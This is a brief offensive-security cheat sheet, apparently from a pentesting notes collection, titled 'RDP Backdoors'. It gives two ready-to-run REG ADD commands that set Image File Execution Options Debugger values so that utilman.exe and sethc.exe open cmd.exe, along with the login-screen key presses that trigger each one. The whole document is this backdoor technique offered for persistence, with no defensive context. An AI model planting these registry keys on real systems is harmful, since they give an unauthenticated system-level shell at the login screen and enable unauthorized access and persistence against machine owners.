# RDP Backdoors

If you have RDP access to a machine, you can use set these Image File Execution Option keys for persistence.

## **utilman.exe**

At the login screen, press Windows Key+U 

```
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
```

## **sethc.exe**

Hit F5 a bunch of times when you are at the RDP login screen.

```
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
```

####

####